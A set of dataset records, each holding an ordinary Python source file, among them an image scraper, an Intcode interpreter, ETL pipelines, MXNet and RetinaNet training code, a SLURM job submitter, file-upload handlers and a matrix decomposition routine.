Then loads options (from argparse).\n \"\"\"\n self.reset()\n\n if config_files is None:\n dirs = appdirs.AppDirs('delta', 'nasa')\n config_files = [os.path.join(dirs.site_config_dir, 'delta.yaml'),\n os.path.join(dirs.user_config_dir, 'delta.yaml')]\n\n for filename in config_files:\n if os.path.exists(filename):\n config.load(filename)\n\n if options is not None:\n config.parse_args(options)\n\nconfig = DeltaConfig()\n","sub_path":"delta/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"612956431","text":"import urllib.request\nimport re\nimport os\n\nweburl = \"http://www.douban.com/\"\nwebheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\nreq = urllib.request.Request(url=weburl, headers=webheaders) #构造请求报头\nwebpage = urllib.request.urlopen(req) #发送请求报头\ncontentBytes = webpage.read()\npiclink = set(re.findall(r'(https:[^\\s]*\\.(jpg|png|gif))', str(contentBytes)))\n\n\nsavedir = \"/Users/ww/picdata\"\nif not os.path.isdir(savedir):\n os.mkdir(savedir)\n\nfor link in piclink: #正则表达式查找所有的图片\n print(link[0])\n savepath = os.path.join(savedir, link[0][link[0].rindex('/')+1:])\n try:\n urllib.request.urlretrieve(link[0], savepath) #下载图片\n except:\n print('失败') #异常抛出","sub_path":"getpics.py","file_name":"getpics.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"149602365","text":"\"\"\"Display the given pyramid with step number accepted from user.\nEg: N=4\n1\n2 4\n3 6 9\n4 8 12 16\"\"\"\n\nn = int(input(\"enter the step number=\"))\n\nfor i in range(1, n + 1):\n for j in range(1, i + 1):\n print(i * j, \" \", end=\"\")\n print()","sub_path":"CO-2/pgm5.py","file_name":"pgm5.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"39478931","text":"from math import prod\n\nSLOPES_TO_CHECK = ((1,1), (3, 1), (5, 1), (7, 1), (1, 2))\n\nwith open(\"day3-input.txt\") as file:\n data = file.readlines()\n\nmap_width = len(data[0]) - 1\n\ndef check_slope(right, down):\n # start in x_position 0\n x_position = 0\n tree_count = 0\n\n # move down by down\n for row in data[down::down]:\n # move across right and use modulus to wrap\n x_position = (x_position + right) % map_width\n # check if new position is a tree and increment count\n if row[x_position] == \"#\":\n tree_count += 1\n return tree_count\n\nprint(prod([check_slope(*slope) for slope in SLOPES_TO_CHECK]))\n","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"30153623","text":"\"\"\"ETL pipelines\"\"\"\nfrom toolz import compose, first, juxt, curry\n\nfrom course_catalog.etl import (\n micromasters,\n loaders,\n see,\n mitpe,\n mitx,\n xpro,\n ocw,\n oll,\n video,\n youtube,\n)\nfrom course_catalog.etl.utils import log_exceptions\nfrom course_catalog.constants import PlatformType\n\n# A few notes on how this module works:\n#\n# - Each pipeline is composed right-to-left\n# - We define normalized loaders of data in loaders.py\n# - Each integration must define an extraction function to fetch the data\n# - Each integration must define an transformation function to normalize the data\n# - Each step is wrapped with log_exceptions and propogates 
and empty value forward (usually [])\n# - This keeps exceptions from being raised all the way up and provides contextual data for the failure\n# - Additional specifics are commented on as needed\nload_programs = curry(loaders.load_programs)\n\nmicromasters_etl = compose(\n load_programs(PlatformType.mitx.value), micromasters.transform, micromasters.extract\n)\n\nxpro_programs_etl = compose(\n load_programs(PlatformType.xpro.value),\n xpro.transform_programs,\n xpro.extract_programs,\n)\nxpro_courses_etl = compose(\n loaders.load_courses, xpro.transform_courses, xpro.extract_courses\n)\n\nmitx_etl = compose(\n loaders.load_courses,\n # take the first argument (the output of mitx.tranform)\n first,\n # duplicate the raw responses into two streams between our transformation code and the ocw/mitx manifest upload\n juxt(\n log_exceptions(\"Error tranforming MITx response\", exc_return_value=[])(\n mitx.transform\n ),\n # for the sake of not touching OCW code, we've implementing this function here in discussions\n # it takes the concatenated raw results from MITx and uploads them as a json file to the OCW bucket\n # we'll probably do away with this at later date when we can easily move it into OCW\n log_exceptions(\"Error uploading MITx manifest to OCW\")(\n ocw.upload_mitx_course_manifest\n ),\n ),\n log_exceptions(\"Error extracting MITx catalog\", exc_return_value=[])(mitx.extract),\n)\n\noll_etl = compose(loaders.load_courses, oll.transform, oll.extract)\n\nsee_etl = compose(loaders.load_courses, see.transform, see.extract)\n\nmitpe_etl = compose(loaders.load_courses, mitpe.transform, mitpe.extract)\n\nyoutube_etl = compose(loaders.load_video_channels, youtube.transform, youtube.extract)\n\n# pipeline for generating topic data for videos based on course topics\nvideo_topics_etl = compose(loaders.load_videos, video.extract_videos_topics)\n","sub_path":"course_catalog/etl/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"490972161","text":"\n# Unite\nunite_ip = '172.20.14.123'\nunite_ssh_usr = 'secret'\nunite_ssh_pwd = 'secret'\n\nudb_path = 'mnt/data/databases'\nudb_files = ['mscAlias.db','uns.db','uus.db']\n\n# ProX\nprox_ip = ''\nprox_url = 'http://wsrodproxstage/UserService/UserService.svc?wsdl'\ndb_ip = 'wsrodproxstage'\n#prox_url = 'http://GSEAT961/UserService/UserService.svc?wsdl'\n\n#db_ip = 'GSEAT961'\nprox_ssh_usr = ''\nprox_ssh_pwd = ''\n\npdb_path = ''\npdb_files = []\n\nprox_frnt_ip = ''\nprox_frnt_usr = ''\nprox_frnt_pwd = ''\n\n# database\n\n\n\nlog_file_path = '../logs/'\nproject_name = 'prox'\nbuild = 'no_build'","sub_path":"TAS/src/deprecated/prox_settings_old/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"95048911","text":"import argparse\nimport collections\n\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\nfrom torchvision import transforms\n\nfrom retinanet import model\nfrom retinanet.dataloader import CSVDataset, collater, Resizer, AspectRatioBasedSampler, Augmenter, \\\n Normalizer\nfrom torch.utils.data import DataLoader\n\nfrom retinanet import csv_eval\n\nassert torch.__version__.split('.')[0] == '1'\n\nprint('CUDA available: {}'.format(torch.cuda.is_available()))\n\n\ndef eval(retinanet, dataloader_test):\n retinanet = retinanet.cuda()\n\n # sampler_val = 
AspectRatioBasedSampler(dataloader_test, batch_size=1, drop_last=False)\n # dataloader_val = DataLoader(dataloader_test, num_workers=0, collate_fn=collater, batch_sampler=sampler_val)\n retinanet.eval()\n with torch.no_grad():\n train_loss = 0\n total = 0\n\n epoch_loss = []\n\n for iter_num, data in enumerate(dataloader_test):\n\n if torch.cuda.is_available():\n classification_loss, regression_loss = retinanet([data['img'].cuda().float(), data['annot']])\n else:\n classification_loss, regression_loss = retinanet([data['img'].float(), data['annot']])\n\n classification_loss = classification_loss.mean()\n regression_loss = regression_loss.mean()\n\n loss = classification_loss + regression_loss\n total = total + 1\n train_loss = train_loss + regression_loss\n\n\n print(\n 'Epoch: {} | Iteration: {} | Classification loss: {:1.5f} | Regression loss: {:1.5f}'.format(\n 0, iter_num, float(classification_loss), float(regression_loss)))\n\n loss = train_loss / total\n return loss\n # print(\"loss \", loss)\n","sub_path":"my_evel.py","file_name":"my_evel.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"105284829","text":"import pygame\nimport board\nimport time\n\nif __name__==\"__main__\":\n reversi = board.Board(100, 8)\n reversi.draw()\n\n while True:\n\n reversi.make_candidate()\n\n events = pygame.event.get()\n\n for event in events:\n if event.type == pygame.MOUSEBUTTONUP:\n x, y = pygame.mouse.get_pos()\n reversi.click_event(x, y)","sub_path":"MyReversi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"404045709","text":"from enum import Enum\nfrom defaultlist import defaultlist\n\n\nclass InstructionType(Enum):\n ADD = 1\n MULTIPLY = 2\n INPUT = 3\n OUTPUT = 4\n JUMP_IF_TRUE = 5\n JUMP_IF_FALSE = 6\n LESS_THAN = 7\n EQUALS = 8\n ADJUST_RELATIVE_BASE = 9\n HALT = 99\n\n\nclass ParameterMode(Enum):\n POSITION = 0\n IMMEDIATE = 1\n RELATIVE = 2\n\n\nclass IntcodeProgram(object):\n num_params = {\n InstructionType.ADD: 3,\n InstructionType.MULTIPLY: 3,\n InstructionType.INPUT: 1,\n InstructionType.OUTPUT: 1,\n InstructionType.JUMP_IF_TRUE: 2,\n InstructionType.JUMP_IF_FALSE: 2,\n InstructionType.LESS_THAN: 3,\n InstructionType.EQUALS: 3,\n InstructionType.ADJUST_RELATIVE_BASE: 1,\n InstructionType.HALT: 0,\n }\n\n def __init__(self, code: str):\n self.code = defaultlist(lambda: 0)\n for s in code.split(','):\n self.code.append(int(s))\n # self.code = [int(s) for s in code.split(',')]\n self.cursor = 0\n self.relative_base = 0\n self.halt = False\n self.input = []\n self.output = []\n\n def read_input(self, value):\n self.input.append(value)\n\n def read_inputs(self, values):\n self.input += values\n\n def read_output(self):\n return self.output.pop(0)\n\n def execute_next(self):\n FULL_DEBUG = False\n\n opcode = self.code[self.cursor]\n if FULL_DEBUG:\n print(\"{}: {} (relbase {})\".format(self.cursor, opcode, self.relative_base))\n\n instruction = InstructionType(int(str(opcode)[-2:]))\n num_p = self.num_params[instruction]\n parameter_modes = [ParameterMode.POSITION]*num_p\n for idx, char in enumerate(reversed(str(opcode)[:-2])):\n parameter_modes[idx] = ParameterMode(int(char))\n values = self.values(parameter_modes)\n addresses = self.addresses(parameter_modes)\n\n if FULL_DEBUG:\n print(instruction.name, parameter_modes, values, addresses)\n\n increment_cursor = 
True\n if instruction == InstructionType.ADD:\n self.code[addresses[2]] = values[0] + values[1]\n elif instruction == InstructionType.MULTIPLY:\n self.code[addresses[2]] = values[0] * values[1]\n elif instruction == InstructionType.INPUT:\n self.code[addresses[0]] = self.input.pop(0)\n elif instruction == InstructionType.OUTPUT:\n self.output.append(values[0])\n elif instruction == InstructionType.JUMP_IF_TRUE:\n if values[0]:\n self.cursor = values[1]\n increment_cursor = False\n elif instruction == InstructionType.JUMP_IF_FALSE:\n if not values[0]:\n self.cursor = values[1]\n increment_cursor = False\n elif instruction == InstructionType.LESS_THAN:\n self.code[addresses[2]] = 1 if values[0] < values[1] else 0\n elif instruction == InstructionType.EQUALS:\n self.code[addresses[2]] = 1 if values[0] == values[1] else 0\n elif instruction == InstructionType.ADJUST_RELATIVE_BASE:\n self.relative_base += values[0]\n elif instruction == InstructionType.HALT:\n self.halt = True\n\n if increment_cursor:\n self.cursor += num_p + 1\n\n if FULL_DEBUG:\n print(self.code)\n\n def execute(self):\n while not self.halt:\n self.execute_next()\n\n def execute_until_output(self):\n while not self.output and not self.halt:\n self.execute_next()\n\n def values(self, parameter_modes):\n return [\n self.code[self.cursor+jdx+1] if parameter_modes[jdx] == ParameterMode.IMMEDIATE\n else self.code[self.relative_base+self.code[self.cursor+jdx+1]] if parameter_modes[jdx] == ParameterMode.RELATIVE\n else self.code[self.code[self.cursor+jdx+1]] # if parameter_modes[jdx] == ParameterMode.POSITION\n for jdx in range(len(parameter_modes))\n ]\n\n def addresses(self, parameter_modes):\n return [\n self.relative_base + self.code[self.cursor+jdx+1] if parameter_modes[jdx] == ParameterMode.RELATIVE\n else self.code[self.cursor+jdx+1]\n for jdx in range(len(parameter_modes))\n ]\n\n def params(self, parameter_modes):\n return [self.code[self.cursor+jdx+1] for jdx in range(len(parameter_modes))]\n\n\ndef test_1():\n code = \"109,1,204,-1,1001,100,1,100,1008,100,16,101,1006,101,0,99\"\n prog = IntcodeProgram(code)\n prog.execute()\n return 'Passed' if prog.output == [int(s) for s in code.split(',')] else 'Failed'\n\n\ndef test_2():\n code = \"1102,34915192,34915192,7,4,7,99,0\"\n prog = IntcodeProgram(code)\n prog.execute()\n return 'Passed' if len(str(prog.output[0])) == 16 else 'Failed'\n\n\ndef test_3():\n code = \"104,1125899906842624,99\"\n prog = IntcodeProgram(code)\n prog.execute()\n return 'Passed' if prog.output[0] == 1125899906842624 else 'Failed'\n\n\nif __name__ == \"__main__\":\n # print(\"Test 1:\", test_1())\n # print(\"Test 2:\", test_2())\n # print(\"Test 3:\", test_3())\n\n with open('input/dec9.txt', 'r') as file:\n program_code = file.readline()\n\n program = IntcodeProgram(program_code)\n program.read_input(2)\n program.execute()\n print(program.output)\n","sub_path":"2019/dec9.py","file_name":"dec9.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"196152435","text":"__author__ = 'saintdragon2'\n\nimport math\n\nclass Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self):\n return '(' + str(self.x) + ', ' + str(self.y) + ')'\n\n def distance(self, other):\n return ((other.x - self.x)**2 + (other.y - self.y)**2)**0.5\n\n\nclass Shape:\n def __init__(self):\n self.vertices = []\n\n def circumference(self):\n length = 0\n for i in range(0, len(self.vertices)-1):\n length += 
self.vertices[i].distance(self.vertices[i+1])\n\n length += self.vertices[0].distance(self.vertices[-1])\n return length;\n\n def center(self):\n min_x = 10e6\n max_x = -10e6\n\n min_y = 10e6\n max_y = -10e6\n\n for p in self.vertices:\n if p.x > max_x:\n max_x = p.x\n if p.x < min_x:\n min_x = p.x\n\n if p.y > max_y:\n max_y = p.y\n if p.x < min_y:\n min_y = p.y\n\n mid_point = Point((max_x+min_x)/2, (max_y+min_y)/2)\n\n return mid_point\n\n def area(self):\n p_0 = self.vertices[0]\n\n sum_area = 0\n\n for i in range(0, len(self.vertices)-2):\n p_1 = self.vertices[i]\n p_2 = self.vertices[i+1]\n\n triangle = Triangle(p_0, p_1, p_2)\n sum_area += triangle.area()\n\n return sum_area\n\n\n\n\nclass Triangle(Shape):\n def __init__(self, a, b, c):\n self.vertices = [a, b, c]\n\n def area(self):\n a = self.vertices[0].distance(self.vertices[1])\n b = self.vertices[1].distance(self.vertices[2])\n c = self.vertices[2].distance(self.vertices[0])\n\n s = (a + b + c) / 2\n\n return math.sqrt( s * (s-a) * (s-b) * (s-c) )\n\n\nclass Square(Shape):\n def __init__(self, a, b, c, d):\n self.vertices = [a, b, c, d]\n\n\nclass Pentagon(Shape):\n def __init__(self, a, b, c, d, e):\n self.vertices = [a, b, c, d, e]\n\n\np = Point(0, 0)\nq = Point(3, 0)\nr = Point(3, 4)\ns = Point(0, 4)\nt = Point(-2, 2)\n\nprint(p.distance(q))\nprint(p.distance(r))\n\ntriangle = Triangle(p, q, r)\n\nfor point in triangle.vertices:\n print(point.x)\n\n\nprint(triangle.circumference())\nprint('area')\nprint(triangle.area())\n\nsquare = Square(p, q, r, s)\nprint(square.circumference())\nprint(square.center().x)\nprint(square.center().y)\nprint(square.center())\nprint('sqaure_area')\nprint(square.area())\n\npenta = Pentagon(p, q, r, s, t)\nprint(penta.circumference())\nprint('penta_area')\nprint(penta.area())","sub_path":"shape_class_civil/Shape.py","file_name":"Shape.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"94761309","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 21 08:55:02 2018\n\n@author: gilbe\n\"\"\"\n\n\"\"\"MXNet symbol API\ntransformers can be implemened in mxnet to use\ngpu computations on the tensor and speed calculations\nat the same time mxnet supports composition of transformers\n\n\"\"\"\nimport logging\nlogging.getLogger().setLevel(logging.INFO)\nimport numpy as np\nimport pandas as pd\nfrom utils.utils import PROJECT_DATA_DIR\nimport os\nimport mxnet as mx\nimport mxnet.ndarray as nd\nfrom time import time\nfrom sklearn.preprocessing import StandardScaler, QuantileTransformer\nfrom load_preprocess import (load_data,\n get_xy,\n scale_data,\n binarize_y,\n prepare_data)\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n#ctx = mx.gpu() if mx.test_utils.list_gpus() else mx.cpu()\n\n\n\ndef train_dnn(train_iter, val_iter,\n hidden_units=[1200, 500, 75],\n num_outputs=1, batch_size=2**9):\n \"\"\" ---Model for binary classification---\n TODO: implement the layers with a for loop, see\n the example jupyter notebook. 
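A rough sketch of that loop (untested), reusing the same calls as below:\n for i, units in enumerate(hidden_units):\n net = mx.sym.FullyConnected(net, name='fc%d' % (i + 1), num_hidden=units)\n net = mx.sym.Activation(net, name='relu%d' % (i + 1), act_type='relu')\n 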
Also remember to use\n enumerate in for loop to get the indeces and values\n in hidden_units\n \"\"\"\n # set the context on GPU is available otherwise CPU\n\n train_iter.reset()\n val_iter.reset()\n\n net = mx.sym.Variable('data')\n net = mx.sym.FullyConnected(\n net,\n name='fc1',\n num_hidden=hidden_units[0])\n\n net = mx.sym.Activation(\n net,\n name='relu1',\n act_type='relu')\n\n net = mx.sym.FullyConnected(\n net,\n name='fc2',\n num_hidden=hidden_units[1])\n\n net = mx.sym.Activation(\n net,\n name='relu2',\n act_type='relu')\n\n net = mx.sym.FullyConnected(\n net,\n name='fc3',\n num_hidden=hidden_units[2])\n\n net = mx.sym.Activation(\n net,\n name='relu3',\n act_type='relu')\n\n net = mx.sym.FullyConnected(\n net,\n name='out',\n num_hidden=num_outputs)\n\n net = mx.sym.LogisticRegressionOutput(\n net,\n name='softmax')\n\n mod = mx.mod.Module(net, context=mx.gpu())\n # pass shapes of iterators to allocate space\n mod.bind(data_shapes=train_iter.provide_data,\n label_shapes=train_iter.provide_label)\n mod.init_params(initializer=mx.init.Xavier())\n mod.init_optimizer(\n optimizer='Adam',\n optimizer_params=(('learning_rate', 0.01), ))\n\n mod.fit(train_data=train_iter,\n eval_data=val_iter,\n optimizer='Adam',\n optimizer_params={'learning_rate': 0.01},\n eval_metric='acc',\n num_epoch=20,\n batch_end_callback = mx.callback.Speedometer(batch_size, 100),\n )\n\n\n# Test implementing lstm in mxnet\ndef train_lstm(train_iter, val_iter,\n hidden_units=[1200, 500, 75],\n num_outputs=1):\n net_lstm = mx.sym.Variable('data')\n weight = mx.sym.Variable('weight', init=mx.init.Zero())\n bias = mx.sym.Variable('bias', init=mx.init.Zero())\n# rnn_h_init = mx.sym.Variable('LSTM_init_h')\n# rnn_c_init = mx.sym.Variable('LSTM_init_c')\n# rnn_params = mx.sym.Variable('LSTM_bias')\n\n num_hidden = 20\n num_lstm_layer = 1\n\n# net = mx.sym.transpose(net, (1, 0, 2))\n # maybe use mx.sym.transpose(data, axes=(1, 0, 2)) ?? 
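the RNN symbol expects its input laid out as 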
(time, batch, columns)\n net_lstm = mx.sym.RNN(\n net_lstm,\n num_layers=num_lstm_layer,\n state_size=num_hidden,\n name='rnn_lstm1',\n mode='lstm',\n# state=rnn_h_init,\n# state_cell=rnn_c_init,\n parameters=weight,\n p=0.4)\n\n net_lstm = mx.sym.FullyConnected(\n net_lstm,\n name='out',\n num_hidden=num_outputs)\n\n net_lstm = mx.sym.LogisticRegressionOutput(\n net_lstm,\n name='softmax')\n\n mod = mx.mod.Module(net_lstm, context=mx.gpu())\n\n mod.bind(data_shapes=train_iter.provide_data,\n label_shapes=train_iter.provide_label)\n\n \"\"\"Xavier not accepted for initialization in LSTM\"\"\"\n mod.init_params(mx.initializer.Uniform(scale=1.0))\n\n mod.init_optimizer(optimizer='Adam',\n optimizer_params=(('learning_rate', 0.01)))\n\n metric = mx.metric.create('acc')\n for epoch in range(20):\n train_iter.reset()\n for batch in train_iter:\n print('shape of batch:', batch.data[0].shape)\n print(batch.data[0].asnumpy())\n break\n predictions = mod.forward(batch, is_train=True)\n# mod.metric_updeta(labels=)\n mod.backward()\n mod.update()\n print('Epoch %d, Training %s' % (epoch))\n\n\n\n# mod.fit(train_data=train_iter,\n# eval_iter=val_iter,\n# optimizer='Adam',\n# optimizer_params={'learning_rate': 0.01},\n# eval_metric='acc',\n# num_epoch=20)\n\n\ndef main():\n train = load_data(file='all_training_400_minisensor_1.csv')\n test = load_data(file='all_test_400_minisensor.csv')\n xtrain, ytrain, xtest, ytest = prepare_data(train, test, binary_class=True)\n xtrain_sc, xtest_sc = scale_data(xtrain, xtest)\n print(xtrain.head())\n print('')\n print(ytrain.head())\n print('xtrain.shape:', xtrain.shape)\n print('xtest.shape:', xtest.shape)\n print('ytrain.shape:', ytrain.shape)\n print('ytest.shape:', ytest.shape)\n\n xtrain_mx = mx.nd.array(xtrain_sc, dtype=np.float32)\n ytrain_mx = mx.nd.array(ytrain.reshape(-1, 1))\n xtest_mx = mx.nd.array(xtest_sc, dtype=np.float32)\n ytest_mx = mx.nd.array(ytest.reshape(-1, 1))\n batch_size=2**9\n\n train_iter = mx.io.NDArrayIter(\n xtrain_mx,\n ytrain_mx,\n batch_size=batch_size,\n shuffle=True)\n\n val_iter = mx.io.NDArrayIter(\n xtest_mx,\n ytest_mx,\n batch_size=batch_size)\n\n train_dnn(train_iter, val_iter)\n\n xtrain_lstm = xtrain.values.reshape(-1, 3)\n xtest_lstm = xtest.values.reshape(-1, 3)\n scaler = QuantileTransformer(output_distribution='normal')\n xtrain_lstm_sc = scaler.fit_transform(xtrain_lstm)\n xtest_lstm_sc = scaler.transform(xtest_lstm)\n\n print(xtrain_lstm_sc.shape)\n print(xtest_lstm_sc.shape)\n \"\"\" Change time steps from 400 to 20 to test if this is the problem\"\"\"\n xtrain_lstm_sc = mx.nd.array(xtrain_lstm_sc.reshape(-1, 400, 3))\n val_lstm_sc = mx.nd.array(xtest_lstm_sc.reshape(-1, 400, 3))\n print('shape of xtrain_lstm_sc:', xtrain_lstm_sc.shape)\n\n # transform to mxnet array\n train_lstm_iter = mx.io.NDArrayIter(\n xtrain_lstm_sc,\n ytrain_mx,\n batch_size,\n shuffle=True,\n last_batch_handle='discard')\n\n val_lstm_iter = mx.io.NDArrayIter(\n val_lstm_sc,\n ytest_mx,\n batch_size,\n shuffle=False,\n last_batch_handle='discard')\n\n print('Start training lstm with mxnet...')\n train_lstm(train_lstm_iter, val_lstm_iter)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n","sub_path":"code/DL_mxnet_symbol.py","file_name":"DL_mxnet_symbol.py","file_ext":"py","file_size_in_byte":7229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"514257284","text":"from handlers.base import BaseHandler\nimport tools.file_helper\n\n\nclass PublicFilesHandler(BaseHandler):\n def 
prepare(self):\n self.get_login_user()\n\n async def get(self):\n files_list = tools.file_helper.list_files(\"public_files\")\n await self.write_res(0, data=files_list)\n\n async def post(self):\n file_metas = self.request.files[\"PublicFiles\"]\n tools.file_helper.write_upload_files(file_metas, \"public_files\")\n await self.write_res(0, \"Upload Successfully\", None)\n\n async def delete(self):\n filename = self.get_argument('filename')\n result = tools.file_helper.delete_file(\"public_files\", filename)\n await self.write_res(0 if result else 1, \"Delete Successfully\" if result else \"File Not Exist\")\n","sub_path":"server/handlers/files_management/public_files.py","file_name":"public_files.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"231975202","text":"#!/usr/bin/env python\nimport subprocess,time,datetime,os\nfrom tqdm import tqdm\n\nnetworks=['vgg-16','resnet-34']\ntarget='llvm '\nbatchs=['4']\nthreads=['4']\nopts=['0','1','2','3','4']\n\nbasetext='''#!/bin/bash \n#SBATCH -J _name \n#SBATCH -o inference/%j._name.out\n#SBATCH -t 1-20:00:00\n#SBATCH --nodes=1\n#SBATCH --ntasks=1\n#SBATCH --tasks-per-node=1\n#SBATCH --cpus-per-task=4\n#SBATCH -p cpu-xg6230\n#SBATCH --nodelist=n14\n\nset echo on\ncd $SLURM_SUBMIT_DIR\necho \"SLURM_SUBMIT_DIR=$SLURM_SUBMIT_DIR\"\n\nsrun -l /bin/hostname\nsrun -l /bin/pwd\nsrun -l /bin/date\n\nmodule purge\nmodule load postech\ndate\nsource env/bin/activate\n/home/jaehunryu/linux/tools/perf/perf stat -d -d -d python3 /home/jaehunryu/workspace/tvm/optimization_tvm/naive.py --opt_level=_opt --network=_network --batch=4 \n\nsqueue --job $SLURM_JOBID\n'''\nos.makedirs('/home/jaehunryu/workspace/tvm/optimization_tvm/inference',exist_ok=True)\nsript='sbatch slurm_inference.sh'\n_list=[]\nfor network in networks:\n for opt in opts:\n _list.append([network,opt])\n \n \nfor idx,pack in enumerate(_list):\n network,opt=pack\n _name='nework_'+network+'_optlevel_'+opt\n\n text=basetext\n text=text.replace('_opt',opt)\n text=text.replace('_network',network)\n text=text.replace('_node',str(idx%6+1))\n text=text.replace('_name',_name)\n\n \n num=subprocess.Popen(\"squeue|grep jaehun|wc -l\", shell=True, stdout=subprocess.PIPE).stdout.read()\n num=int(num.decode(\"utf-8\")[:-1])\n while num>20:\n num=subprocess.Popen(\"squeue|grep jaehun|wc -l\", shell=True, stdout=subprocess.PIPE).stdout.read()\n num=int(num.decode(\"utf-8\")[:-1])\n time.sleep(5)\n with open('/home/jaehunryu/workspace/tvm/optimization_tvm/slurm_inference.sh', 'w') as f:\n f.write(text)\n time.sleep(17)\n proc = subprocess.Popen( sript , shell=True, executable='/bin/bash')\n proc.communicate()\n\n","sub_path":"optimization_tvm/test_inference.py","file_name":"test_inference.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"317396359","text":"#-------------------------------------------------------------------------------\n# Exemple de tracé explicite d'une fonction f(u)\n# Utilisation de la bibliothèque \"pylab\"\n#-------------------------------------------------------------------------------\n\n# Importation de pylab\nfrom pylab import *\n\nl=1000\na = 300\nb = 150\n\n# définition de la fonction (relation explicite) de la forme f(u)\ndef f(l,teta):\n return 2*l*sin(teta)\ndef Lambda(l,teta,a,b):\n return ((l-a-b)**2+4*b*(l-a)*(sin(teta))**2)**0.5\n\ndef course(Y,teta):\n tmin, tmax = 0,0\n for i in 
range(len(teta)-1):\n if (f(l,teta[i])<=200 and f(l,teta[i+1])>=200):\n tmin=teta[i]\n elif (f(l,teta[i])<=1700 and f(l,teta[i+1])>=1700):\n tmax=teta[i]\n print(int(Lambda(l,tmax,a,b)-Lambda(l,tmin,a,b)))\n\n# définition de la grille en X et calcul des valeurs de Y correspondantes\nX = linspace(-10, 10, 500)\nteta = linspace(0,pi/2,1000)\nY = f(l,teta)\nL = Lambda(l,teta,a,b)\n\n# tracé de la fonction\n\nplot(L,Y , color='blue',linewidth=2)\nlsp = linspace(550,775,1000)\nplot(lsp,len(lsp)*[200],'--')\nplot(lsp,len(lsp)*[1700],'--')\n\nlsp = linspace(200,1700,1000)\nplot(len(lsp)*[550],lsp,'--')\nplot(len(lsp)*[775], lsp, '--')\n\n# habillage\nxlabel('abscisses x')\nylabel('ordonnées y')\ntitle('y=f(x)')\nxticks(arange(500,850,50))\nyticks(arange(0, 2000 , 250))\ngrid()\n\n\n\nshow()\ncourse(L,teta)\n","sub_path":"PCSI/semestre 2/1-TP Matplotlib/Fichiers TP - Copie/explicite.py","file_name":"explicite.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"512908133","text":"\nimport networkx\n\nfrom les.mp_model import MPModel\nfrom les.decomposers import decomposer_base\nfrom les.graphs.decomposition_tree import DecompositionTree\nfrom les.utils import logging\n\ndef _get_indices(m, i):\n start = m.indptr[i]\n size = m.indptr[i + 1] - start\n result = []\n for j in xrange(start, start + size):\n result.append(m.indices[j])\n return result\n\n\nclass FinkelsteinAdvDecomposer(decomposer_base.DecomposerBase):\n '''\n :param model: A :class:`~les.mp_model.mp_model.MPModel` based model instance.\n '''\n\n def __init__(self, model):\n decomposer_base.DecomposerBase.__init__(self, model)\n self._u = []\n self._s = []\n self._m = []\n self._p = []\n self._used = []\n self._used2 = []\n self._layers =[]\n self._layermodel =[]\n\n def get_component(self,i):\n if self._p[i]!=i:\n self._p[i]=self.get_component(self._p[i])\n return self._p[i]\n\n def unite_components(self, i, j):\n\n i=self.get_component(i)\n j=self.get_component(j)\n self._p[i]=j\n\n def decompose(self, initial_cols=[0], max_separator_size=0,\n merge_empty_blocks=True):\n '''Decomposes model into submodels starting by initial cols. By default\n starts from column 0. 
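Note that a nonzero max_separator_size currently raises NotImplementedError below. 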
Default max separator size is 11.\n\n :param initial_cols: A list of integers.\n :param max_separator_size: An integer that represents max available\n separator size.\n :param merge_empty_blocks: ``True`` or ``False``, whether or not we need to\n merge empty blocks.\n '''\n if max_separator_size:\n raise NotImplementedError()\n logging.info('Decompose model %s', self._model.get_name())\n\n self._used=[]\n self._used2=[]\n self._p=[]\n\n m = self._model.get_rows_coefficients()\n\n j_to_i_mapping = {}\n for j in range(m.shape[1]):\n j_to_i_mapping[j] = set()\n\n # TODO(d2rk): use interaction graph?\n g = networkx.Graph()\n g.add_nodes_from(range(m.shape[1]))\n for i in xrange(m.shape[0]):\n J_ = _get_indices(m, i)\n for j in range(len(J_) - 1):\n j_to_i_mapping[J_[j]].add(i)\n for j_ in range(j + 1, len(J_)):\n g.add_edge(J_[j], J_[j_])\n j_to_i_mapping[J_[-1]].add(i)\n\n def get_neighbors(nodes):\n neighbors = set()\n for node in nodes:\n neighbors.update(g.neighbors(node))\n neighbors.update(nodes)\n 